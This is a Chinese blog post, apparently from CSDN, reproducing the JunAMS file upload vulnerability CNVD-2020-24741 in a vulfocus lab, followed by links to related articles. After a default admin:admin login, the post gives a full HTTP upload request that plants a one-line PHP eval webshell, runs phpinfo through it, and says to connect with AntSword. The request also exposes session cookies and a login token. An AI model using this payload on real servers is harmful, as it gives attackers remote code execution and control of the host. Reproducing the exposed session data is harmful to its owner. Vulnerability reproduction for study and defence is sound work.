junams 文件上传 (CNVD-2020-24741)

最新推荐文章于 2024-08-07 15:41:06 发布
最新推荐文章于 2024-08-07 15:41:06 发布
阅读量307 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51780583/article/details/139007553
版权

漏洞环境搭建:vulfocus

发现这个页面后,通过访问IP:Port/admin.php,登录后台

通过默认用户名密码admin:admin进行登录

登录后台后,主要思路就是找到网站的文件上传点,然后去上传一句话木马,或者找到命令执行的地方去拿到网站服务器的shell。

最后在”系统设置->版本管理->添加“处找到图片上传点,直接burp抓包当前页面,然后上传文件请求包,请求包内容如下

POST //admin.php/common/add_images.html HTTP/1.1
Host: 47.109.191.51:10001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326774743432415414462475084350
Content-Length: 269
Origin: http://47.109.191.51:10001
Connection: close
Referer: http://47.109.191.51:10001/admin.php/edition/add.html
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636957776,1637035618,1637078936,1637219652; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1636704940,1636709021,1636825689,1637222671; _ga=GA1.2.744261971.1636781886; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1637221849; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM3MzA2MDA0LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.4Gr7Mkd6jMvSpaNITDQoww0jUnSP1d59O34IpzyDpmI; PHPSESSID=7jrca24napuo1umgs5s58dfhvu; _gid=GA1.2.277758474.1637219810; ktqnjecmsdodbdata=empirecms; ktqnjeloginlic=empirecmslic; ktqnjloginadminstyleid=1; ktqnjlogintime=1637222551; ktqnjtruelogintime=1637222430; ktqnjloginuserid=1; ktqnjloginusername=admin; ktqnjloginrnd=5I62uWWbyxT9vB9Fi6FU; ktqnjloginlevel=1; ktqnjloginecmsckpass=35f1e6e02526a8193d735f89d9093f80; ktqnjloginecmsckfrnd=gkgk52G7rpQ6xWOHlfLWxgdFpG9; ktqnjloginecmsckfdef=N0VHyuu3ljnoPVbceYkXaX; ktqnjemecOYNqOjnu=BXWggMbbslguQiExvN; Hm_lpvt_b5514a35664fd4ac6a893a1e56956c97=1637222890; thinkphp_show_page_trace=0|0; eth0_time=1637226896; eth0_num=0; eth0=249.118; login_auto=YXs3g0Y%3D%7C0e2c7f3efd15db77ba3f2ec9ab35f8347cb5be0d
Upgrade-Insecure-Requests: 1

-----------------------------326774743432415414462475084350
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[1]); ?> 
-----------------------------326774743432415414462475084350--

上传成功

然后访问:http://47.109.191.51:10001/public\/edit\/20240411\/8817b191ad1f76ad48908b33832e0b5b.php?1=phpinfo();

既然访问成功,那么直接使用蚁剑连接。

打你的小脑斧
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CNVD-2020-10487(CVE-2020-1938)tomcat ajp 文件读取漏洞
Summer's blog
05-13 2万+
**# 漏洞简介    Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响范围 Apache Tomca...
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
junams 文件上传 (CNVD-2020-24741)
小小猪的博客
12-30 1963
junams 文件上传 (CNVD-2020-24741) 漏洞简介: JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 影响版本: JunAMS v1.2.1.20190403 环境搭建: 在线环境 地址 漏洞复现: 访问后台 账号admin密码admin 点击系统设置->版本设置->图片上传 burp进行抓包,可以看到有上传功能 分析common...
JunAMS文件上传(CNVD-2020-24741)
m0_65150886的博客
02-21 1037
JunAMS junAMS 1.2.1.20190403版本存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。2.访问http://ip:port/admin.php,进入后台登录页面。后台路径 /admin.php 账号密码 admin:admin。3.输入账号密码进行登录,若显示系统正在处理中,点击F5刷新页面。JunAMS是一款以ThinkPHP为框架的开源内容管理系统。1.访问http://ip:port,出现如下页面,开始实验。4.通过burp发送如下poload。
junams 文件上传CNVD-2020-24741)复现
YouthBelief的博客
11-18 2855
所有文章,仅供安全研究与学习之用,后果自负! junams 文件上传CNVD-2020-24741junams 文件上传CNVD-2020-24741)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复总结 junams 文件上传CNVD-2020-24741) 0x01 漏洞描述 JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 后台路径 /admin.p
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
大雪封山的时候
02-22 9014
2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下的任意文件。目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat 是 Apache 软件基...
SSM整合之文件上传---MultipartFile-(绝对详细)
amspony的博客
09-19 1295
项目中用到的 文件上传 添加到 数据库 保存路径 注意,上传功能,需要引入两个依赖 <!-- 文件上传的jar包 --> <dependency> <groupId>commons-io</groupId> <artifactId>commons-io</artifactId> <version>2.4</version> </dependency
java网络编程----控制台版文件上传(版本二)
amspony的博客
04-13 109
package com.itheima.demo05; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.Socket; /** * @author Mr.liu * @date 2021年04月13日 17:00 */ public class Client {
CNVD-2020-10487.7z
09-19
标题中的"CNVD-2020-10487.7z"是指中国国家信息安全漏洞库(China National Vulnerability Database,简称CNVD)在2020年记录的一个编号为CNVD-2020-10487的安全漏洞。这个漏洞主要涉及到Apache Tomcat服务器,而...
PeiQi0#PeiQi-WIKI-Book#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 916
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 950
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
最新发布
lurenjia404的博客
08-07 721
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1436
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 313
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
CNVD-2020-24741
06-01
CNVD-24741是一项关于Apache Kylin的安全漏洞,该漏洞允许攻击者通过Kylin API的未经身份验证的访问,执行恶意代码或获取敏感信息。该漏洞影响了Apache Kylin 2.6.0之前的所有版本。 建议您及时升级到最新版本以避免受到攻击。此外,您还可以通过限制Kylin API的访问权限来减少此漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值